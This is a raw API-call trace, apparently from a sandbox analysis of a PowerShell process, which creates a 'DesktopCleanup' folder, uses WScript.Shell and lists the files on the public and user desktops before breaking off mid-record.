[0165.158] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.159] EtwEventActivityIdControl () returned 0x0 [0165.159] EtwEventActivityIdControl () returned 0x0 [0165.159] EtwEventActivityIdControl () returned 0x0 [0165.166] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\desktopcleanup")) returned 0xffffffff [0165.166] EtwEventActivityIdControl () returned 0x0 [0165.166] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.167] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.167] EtwEventActivityIdControl () returned 0x0 [0165.167] EtwEventActivityIdControl () returned 0x0 [0165.167] EtwEventActivityIdControl () returned 0x0 [0165.171] EtwEventActivityIdControl () returned 0x0 [0165.171] EtwEventActivityIdControl () returned 0x0 [0165.171] EtwEventActivityIdControl () returned 0x0 [0165.172] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\desktopcleanup")) returned 0xffffffff [0165.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x21 [0165.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x21, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0165.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x30 [0165.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup", nBufferLength=0x30, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup", lpFilePart=0x0) returned 0x2f [0165.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e1c0) returned 1 [0165.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\desktopcleanup"), fInfoLevelId=0x0, lpFileInformation=0x5a0e484 | out: lpFileInformation=0x5a0e484*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e1bc) returned 1 [0165.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e1c0) returned 1 [0165.173] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\desktopcleanup"), fInfoLevelId=0x0, lpFileInformation=0x5a0e484 | out: lpFileInformation=0x5a0e484*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e1bc) returned 1 [0165.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e1c0) returned 1 [0165.173] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x5a0e484 | out: lpFileInformation=0x5a0e484*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8368b360, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x8368b360, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0165.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e1bc) returned 1 [0165.173] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\desktopcleanup"), lpSecurityAttributes=0x0) returned 1 [0165.174] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x30 [0165.174] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup", nBufferLength=0x30, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\DesktopCleanup", lpFilePart=0x0) returned 0x2f [0165.175] EtwEventActivityIdControl () returned 0x0 [0165.175] EtwEventActivityIdControl () returned 0x0 [0165.175] EtwEventActivityIdControl () returned 0x0 [0165.175] EtwEventActivityIdControl () returned 0x0 [0165.176] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.319] EtwEventActivityIdControl () returned 0x0 [0165.319] EtwEventActivityIdControl () returned 0x0 [0165.319] EtwEventActivityIdControl () returned 0x0 [0165.529] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop" (normalized: "c:\\users\\public\\desktop")) returned 0x13 [0165.532] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop" (normalized: "c:\\users\\public\\desktop")) returned 0x13 [0165.543] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop" (normalized: "c:\\users\\public\\desktop")) returned 0x13 [0165.543] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Desktop" (normalized: "c:\\users\\public\\desktop")) returned 0x13 [0165.543] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0165.543] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x18, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0165.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e564) returned 1 [0165.553] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0165.553] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x18, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0165.553] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.lnk" (normalized: "c:\\users\\public\\desktop\\*.lnk"), lpFindFileData=0x5a0e314 | out: lpFindFileData=0x5a0e314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0165.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e564) returned 1 [0165.554] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0165.554] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x18, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0165.554] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.lnk" (normalized: "c:\\users\\public\\desktop\\*.lnk"), lpFindFileData=0x5a0e314 | out: lpFindFileData=0x5a0e314*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0165.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e324) returned 1 [0165.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e584) returned 1 [0165.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e324) returned 1 [0165.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e584) returned 1 [0165.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e568) returned 1 [0165.569] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0165.569] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x18, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0165.569] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*" (normalized: "c:\\users\\public\\desktop\\*"), lpFindFileData=0x5a0e318 | out: lpFindFileData=0x5a0e318*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe2f8 [0165.570] FindNextFileW (in: hFindFile=0x5bfe2f8, lpFindFileData=0x5a0e36c | out: lpFindFileData=0x5a0e36c*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.570] FindNextFileW (in: hFindFile=0x5bfe2f8, lpFindFileData=0x5a0e36c | out: lpFindFileData=0x5a0e36c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.570] FindNextFileW (in: hFindFile=0x5bfe2f8, lpFindFileData=0x5a0e36c | out: lpFindFileData=0x5a0e36c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0165.570] FindClose (in: hFindFile=0x5bfe2f8 | out: hFindFile=0x5bfe2f8) returned 1 [0165.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e324) returned 1 [0165.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e584) returned 1 [0165.570] EtwEventActivityIdControl () returned 0x0 [0165.586] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x5a0e3e0, nSize=0xd7 | out: lpBuffer="") returned 0x12 [0165.586] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x5a0e670, nSize=0xd7 | out: lpBuffer="") returned 0x12 [0165.588] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x5a0e3e0, nSize=0xd7 | out: lpBuffer="") returned 0x22 [0165.589] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x5a0e670, nSize=0xd7 | out: lpBuffer="") returned 0x22 [0165.591] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x5a0e3e0, nSize=0xd7 | out: lpBuffer="") returned 0x20 [0165.591] GetEnvironmentVariableW (in: lpName="LOCALAPPDATA", lpBuffer=0x5a0e670, nSize=0xd7 | out: lpBuffer="") returned 0x20 [0165.592] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e490, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.593] EtwEventActivityIdControl () returned 0x0 [0165.593] EtwEventActivityIdControl () returned 0x0 [0165.593] EtwEventActivityIdControl () returned 0x0 [0165.609] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0x2725480 | out: lpclsid=0x2725480*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0165.643] CoGetClassObject (in: rclsid=0x6615c4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x71e06bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5a0e074 | out: ppv=0x5a0e074*=0x283d08) returned 0x0 [0165.732] WshShell:IUnknown:QueryInterface (in: This=0x283d08, riid=0x71dcdd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0e28c | out: ppvObject=0x5a0e28c*=0x0) returned 0x80004002 [0165.732] WshShell:IClassFactory:CreateInstance (in: This=0x283d08, pUnkOuter=0x0, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0e298 | out: ppvObject=0x5a0e298*=0x283d34) returned 0x0 [0165.732] WshShell:IUnknown:Release (This=0x283d08) returned 0x0 [0165.734] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0debc | out: ppvObject=0x5a0debc*=0x283d34) returned 0x0 [0165.734] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0de70 | out: ppvObject=0x5a0de70*=0x0) returned 0x80004002 [0165.735] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0dc98 | out: ppvObject=0x5a0dc98*=0x283d24) returned 0x0 [0165.735] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x283d24, ppTI=0x5a0dca0 | out: ppTI=0x5a0dca0*=0x5c3dbf0) returned 0x0 [0165.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dbf0, ppTypeAttr=0x5a0dc94, pDummy=0x40e4b91c | out: ppTypeAttr=0x5a0dc94, pDummy=0x40e4b91c) returned 0x0 [0165.744] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dbf0) returned 0x633acc8 [0165.744] WshShell:IUnknown:Release (This=0x283d24) returned 0x2 [0165.744] WshShell:IUnknown:Release (This=0x5c3dbf0) returned 0x1 [0165.744] WshShell:IUnknown:AddRef (This=0x283d34) returned 0x3 [0165.744] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d7cc | out: ppvObject=0x5a0d7cc*=0x0) returned 0x80004002 [0165.744] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d77c | out: ppvObject=0x5a0d77c*=0x0) returned 0x80004002 [0165.744] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d788 | out: ppvObject=0x5a0d788*=0x0) returned 0x80004002 [0165.744] CoGetContextToken (in: pToken=0x5a0d7e8 | out: pToken=0x5a0d7e8) returned 0x0 [0165.744] CoGetObjectContext (in: riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5bfa97c | out: ppv=0x5bfa97c*=0x6239d0) returned 0x0 [0165.744] CoGetContextToken (in: pToken=0x5a0dbfc | out: pToken=0x5a0dbfc) returned 0x0 [0165.745] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc7c | out: ppvObject=0x5a0dc7c*=0x0) returned 0x80004002 [0165.745] WshShell:IUnknown:Release (This=0x283d34) returned 0x2 [0165.745] WshShell:IUnknown:Release (This=0x283d34) returned 0x1 [0165.745] EtwEventActivityIdControl () returned 0x0 [0165.760] CoCreateGuid (in: pguid=0x5a0e918 | out: pguid=0x5a0e918*(Data1=0xe6c08883, Data2=0x56a9, Data3=0x4cb9, Data4=([0]=0x9a, [1]=0x83, [2]=0x19, [3]=0xef, [4]=0x31, [5]=0x5c, [6]=0x48, [7]=0x6d))) returned 0x0 [0165.760] CoCreateGuid (in: pguid=0x5a0e918 | out: pguid=0x5a0e918*(Data1=0x1af3c49c, Data2=0x30a2, Data3=0x4116, Data4=([0]=0xa9, [1]=0xeb, [2]=0xef, [3]=0x30, [4]=0x6f, [5]=0xd4, [6]=0x97, [7]=0xf))) returned 0x0 [0165.760] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e4e8, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.760] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0e4e8, nSize=0xd7 | out: lpBuffer="") returned 0x0 [0165.853] EtwEventActivityIdControl () returned 0x0 [0165.853] EtwEventActivityIdControl () returned 0x0 [0165.853] EtwEventActivityIdControl () returned 0x0 [0165.889] EtwEventActivityIdControl () returned 0x0 [0165.889] EtwEventActivityIdControl () returned 0x0 [0165.889] EtwEventActivityIdControl () returned 0x0 [0165.889] EtwEventActivityIdControl () returned 0x0 [0165.889] EtwEventActivityIdControl () returned 0x0 [0165.889] EtwEventActivityIdControl () returned 0x0 [0165.895] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop")) returned 0x11 [0165.897] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop")) returned 0x11 [0165.898] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop")) returned 0x11 [0165.898] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1b [0165.898] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x1b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0165.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e548) returned 1 [0165.898] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1b [0165.898] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x1b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0165.898] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x5a0e2f8 | out: lpFindFileData=0x5a0e2f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x40d1e300, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x40d1e300, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe138 [0165.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e548) returned 1 [0165.899] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1b [0165.899] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x1b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0165.899] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x5a0e2f8 | out: lpFindFileData=0x5a0e2f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x40d1e300, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x40d1e300, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe278 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x40d1e300, ftLastAccessTime.dwHighDateTime=0x1d94ef4, ftLastWriteTime.dwLowDateTime=0x40d1e300, ftLastWriteTime.dwHighDateTime=0x1d94ef4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32dc4300, ftCreationTime.dwHighDateTime=0x1d8c12b, ftLastAccessTime.dwLowDateTime=0x8a79ee60, ftLastAccessTime.dwHighDateTime=0x1d8c12f, ftLastWriteTime.dwLowDateTime=0x8a79ee60, ftLastWriteTime.dwHighDateTime=0x1d8c12f, nFileSizeHigh=0x0, nFileSizeLow=0x12aaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="0KhdgvCwY.jpg", cAlternateFileName="0KHDGV~1.JPG")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f08350, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0xe22c9210, ftLastAccessTime.dwHighDateTime=0x1d8c117, ftLastWriteTime.dwLowDateTime=0xe22c9210, ftLastWriteTime.dwHighDateTime=0x1d8c117, nFileSizeHigh=0x0, nFileSizeLow=0x67cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5tfgYd 5zBc5i_nbR.xls", cAlternateFileName="5TFGYD~1.XLS")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900e9080, ftCreationTime.dwHighDateTime=0x1d8c006, ftLastAccessTime.dwLowDateTime=0x5003d310, ftLastAccessTime.dwHighDateTime=0x1d8c0d3, ftLastWriteTime.dwLowDateTime=0x5003d310, ftLastWriteTime.dwHighDateTime=0x1d8c0d3, nFileSizeHigh=0x0, nFileSizeLow=0x104a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="7hf9.wav", cAlternateFileName="")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de03b20, ftCreationTime.dwHighDateTime=0x1d8b273, ftLastAccessTime.dwLowDateTime=0x19bb6660, ftLastAccessTime.dwHighDateTime=0x1d8b507, ftLastWriteTime.dwLowDateTime=0x19bb6660, ftLastWriteTime.dwHighDateTime=0x1d8b507, nFileSizeHigh=0x0, nFileSizeLow=0x156d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="8T4n_1qLOLjxL90.bmp", cAlternateFileName="8T4N_1~1.BMP")) returned 1 [0165.900] FindNextFileW (in: hFindFile=0x5bfe138, lpFindFileData=0x5a0e34c | out: lpFindFileData=0x5a0e34c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f3c980, ftCreationTime.dwHighDateTime=0x1d8b413, ftLastAccessTime.dwLowDateTime=0x36bfa680, ftLastAccessTime.dwHighDateTime=0x1d8bb7f, ftLastWriteTime.dwLowDateTime=0x36bfa680, ftLastWriteTime.dwHighDateTime=0x1d8bb7f, nFileSizeHigh=0x0, nFileSizeLow=0x8ec6, dwReserved0=0x0, dwReserved1=0x0, 